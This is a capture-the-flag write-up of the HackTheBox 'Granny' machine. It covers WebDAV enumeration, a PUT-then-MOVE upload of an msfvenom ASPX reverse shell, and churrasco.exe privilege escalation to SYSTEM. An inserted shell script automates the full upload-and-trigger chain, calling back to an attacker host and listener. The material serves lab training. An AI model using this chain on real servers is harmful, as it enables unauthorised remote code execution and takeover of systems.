
HackTheBox_Granny | w/o Metasploit

HTB - Granny


Enumeration

Nmap Scan Results

To start the enumeration, I performed an Nmap scan to discover open ports and services running on the target machine.

Nmap Scan Results

Checking for Supported HTTP Methods

I then checked which HTTP methods the server accepts. An OPTIONS request returns them in the Allow header, and a long list that includes PUT, MOVE, COPY or PROPFIND is a strong sign that WebDAV is enabled.

HTTP Methods Check

What is WebDAV?

Web Distributed Authoring and Versioning (WebDAV) is an extension of HTTP that lets clients create, change, move and delete files on a web server directly over HTTP, using extra methods such as PUT, DELETE, COPY, MOVE, MKCOL and PROPFIND. Work on it started in 1996; it was first standardised in RFC 2518 (1999) and later revised in RFC 4918 (2007). From an attacker's point of view, a WebDAV share that accepts unauthenticated writes is an arbitrary file upload.

ASP.NET Response Header

The response headers show that the site is powered by ASP.NET (the X-Powered-By header).

ASP.NET Header

This tells us that the server can execute ASP.NET pages, so if we can get an .aspx file into the web root, the server will run it when we request it.
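The two checks above (the OPTIONS request for supported methods and the look at the response headers) can be done in one pass. The script below is an added example, not the post's own commands: it reads a raw HTTP response, pulls out the Allow, DAV and X-Powered-By headers, and flags the methods that let a client write to or rename files on the server. The target URL and the sample response are constructed assumptions, not data captured from the box.

```shell
#!/bin/sh
# Added example (not from the original post): summarise what an OPTIONS response tells us.
# TARGET is an assumed value; the sample response below is constructed, not captured from the box.
TARGET="${TARGET:-http://10.10.10.15}"

# header NAME: print the value of the first header called NAME from a raw HTTP response on stdin.
header() {
    grep -i "^$1:" | head -n 1 | cut -d: -f2- | tr -d '\r' | sed 's/^ *//'
}

# risky_methods "ALLOW-VALUE": keep only the methods that create, change, rename or lock server files.
risky_methods() {
    printf '%s\n' "$1" | tr ',' '\n' | tr -d ' ' | tr 'a-z' 'A-Z' |
        grep -E '^(PUT|DELETE|MOVE|COPY|MKCOL|PROPPATCH|LOCK|UNLOCK)$' |
        tr '\n' ' ' | sed 's/ *$//'
}

# report: read a raw OPTIONS response on stdin and print one line per finding.
report() {
    resp=$(cat)
    allow=$(printf '%s\n' "$resp" | header Allow)
    dav=$(printf '%s\n' "$resp" | header DAV)
    powered=$(printf '%s\n' "$resp" | header X-Powered-By)
    risky=$(risky_methods "$allow")
    [ -n "$dav" ] && echo "webdav: enabled (DAV: $dav)"
    [ -n "$risky" ] && echo "writable methods: $risky"
    [ -n "$powered" ] && echo "powered-by: $powered"
    case "$risky" in
        *MOVE*) echo "note: MOVE can rename an uploaded .txt to an executable extension" ;;
    esac
    case "$powered" in
        *ASP.NET*) echo "note: ASP.NET means an uploaded .aspx page will be executed" ;;
    esac
    return 0
}

# Constructed sample of the kind of response a WebDAV-enabled IIS host returns (not from the box).
SAMPLE_RESPONSE=$(printf 'HTTP/1.1 200 OK\r\nAllow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\nDAV: 1, 2\r\nX-Powered-By: ASP.NET\r\nContent-Length: 0\r\n\r\n')

printf '%s\n' "$SAMPLE_RESPONSE" | report

# Against a live target, feed the real response in instead of the sample:
if [ "${1:-}" = live ]; then
    curl -sSi -X OPTIONS "$TARGET/" | report
fi
```

Run it with no arguments to see the summary for the constructed sample, or with `live` (and `TARGET` set) to send a real OPTIONS request. The interesting combination is a writable method list that contains MOVE together with an ASP.NET backend, which is exactly what the rest of this post exploits.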

Directory Buster Results

I used Dirbuster to find directories and files on the server.

Dirbuster Results

Nothing useful was found.

Performing DAVTest

I ran DAVTest, which uploads a small test file for each of several extensions and reports which types the server accepts and which of them it executes.

DAVTest Results 1

DAVTest Results 2

Vulnerabilities

Reverse Shell Through HTTP Methods

Even if PUT refuses files with executable extensions, WebDAV's MOVE method lets us rename a file that is already on the server. That gives a way to land a reverse shell through the HTTP methods alone.

Exploitation

Using the MOVE Method

The MOVE method renames (or moves) a file on the server. Let's upload a harmless .txt file and then MOVE it to an .asp name, to see whether that gets around the restriction on uploading ASP files directly.

cURL (client URL) is a command-line tool for transferring data to and from a server. By default it sends a GET, but -X changes the request method to anything the server understands, such as POST, PUT, DELETE or the WebDAV methods. For MOVE, the new name is not part of the URL: it goes in a Destination header that carries the full target URL.

cURL Command

Renaming the File

Perfect, now let’s try renaming it.

Renaming File 1

Renaming File 2

Creating a Reverse Shell Payload

I used msfvenom to create a reverse shell payload, uploaded it to the server as a .txt file, and then renamed it to .asp.

Reverse Shell Payload Creation

Renaming to ASPX

Renaming the file to .aspx.

Renaming to ASPX

Testing the Payload

When I requested the file with curl, I got an error, most likely because the payload's formatting had been lost during the upload.

Error on Curling

Preserving Formatting

The cause is that curl's -d @file option is meant for form data: it strips the newlines from the file it reads, which mangles the ASPX source. Uploading with --data-binary @file instead sends the file byte-for-byte and preserves the formatting.

Preserving Formatting

Accessing the Uploaded File

I visited the site to see if the formatting was preserved.

File Accessed

Great, the formatting is preserved.

Formatting Preserved
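The upload steps above, from generating the payload through PUT, MOVE and the final request, put together as one script. This is an added example, not the post's own commands: it generates the ASPX shell with msfvenom, uploads it under a .txt name with --data-binary so its formatting survives, renames it with MOVE via the Destination header, and then requests the renamed page while a listener waits. The target URL, attacker address and port, and the file names are assumptions; CURL can be pointed at another command for a dry run that only shows the arguments.

```shell
#!/bin/sh
# Added example (not from the original post): WebDAV PUT + MOVE upload of an ASPX reverse shell.
# Assumed values: target base URL, attacker IP/port, file names. Override them via the environment.
TARGET="${TARGET:-http://10.10.10.15}"
LHOST="${LHOST:-10.10.14.2}"
LPORT="${LPORT:-4444}"
PAYLOAD="${PAYLOAD:-shell.txt}"     # uploaded under a harmless extension first
FINAL="${FINAL:-shell.aspx}"        # the name it gets after MOVE
CURL="${CURL:-curl}"                # set CURL='printf %s\n' to dry-run and print the arguments

# Generate an ASPX reverse shell; msfvenom's aspx output is plain text, so a .txt name is fine.
gen_payload() {
    msfvenom -p windows/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f aspx -o "$PAYLOAD"
}

# PUT the file. --data-binary sends it byte-for-byte; plain -d would strip the newlines and
# leave the ASPX source unparsable (the error seen above).
webdav_put() {   # webdav_put LOCALFILE REMOTENAME
    $CURL -sS -o /dev/null -w '%{http_code}\n' -X PUT --data-binary "@$1" "$TARGET/$2"
}

# MOVE renames the file server-side. The new location goes in the Destination header as a
# full URL, and Overwrite: T lets the rename be re-run after a failed attempt.
webdav_move() {  # webdav_move REMOTENAME NEWNAME
    $CURL -sS -o /dev/null -w '%{http_code}\n' -X MOVE \
        -H "Destination: $TARGET/$2" -H "Overwrite: T" "$TARGET/$1"
}

# Request the renamed page so IIS compiles and runs it; the request hangs while the shell is live.
trigger() {      # trigger REMOTENAME
    $CURL -sS -o /dev/null -w '%{http_code}\n' "$TARGET/$1"
}

main() {
    gen_payload
    echo "PUT  -> $(webdav_put "$PAYLOAD" "$PAYLOAD")"   # 201 Created for a new file
    echo "MOVE -> $(webdav_move "$PAYLOAD" "$FINAL")"    # 201 Created (204 if it overwrote)
    echo "start the listener in another terminal first: nc -lvnp $LPORT"
    echo "GET  -> $(trigger "$FINAL")"
}

if [ "${1:-}" = run ]; then
    main
fi
```

Run it as `sh upload.sh run` with the listener already waiting. Checking the status code of each step separately is worth the extra lines: a PUT that returns 403 tells you the extension is filtered, a MOVE that returns 403 or 409 tells you the rename itself is blocked or the Destination URL is wrong, and that distinction is what decides whether the rename trick works on a given server.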

Privilege Escalation

Unfortunately, the shell runs as a low-privileged user. To escalate, I checked the system information and searched for exploits matching it.

System Info

Exploit Search 1

Exploit Search 2

Exploit Search 3

Writable Directory

Looking for a writable directory on the victim’s machine.

Writable Directory 1

Writable Directory 2

Uploading Files

I uploaded churrasco.exe and nc.exe (the Netcat binary) to the writable directory.

Uploading Churrasco

Netcat Listener

Netcat Listener Setup

Fetching churrasco.exe on the victim

Netcat Listener Setup

Setting Up Another Listener

Setting up another Netcat listener.

Netcat Listener Setup

Running the Exploit

Running churrasco.exe with nc.exe as its command, so that the new shell connects back to the second listener. churrasco runs the command it is given with SYSTEM privileges, which is what makes the connection that comes back an elevated one.

Running Exploit 1

Running Exploit 2

We now have an elevated shell. Let's grab the flags.

User Flag

User Flag

Root Flag

Root Flag

Pwned

This post is licensed under CC BY 4.0 by the author.
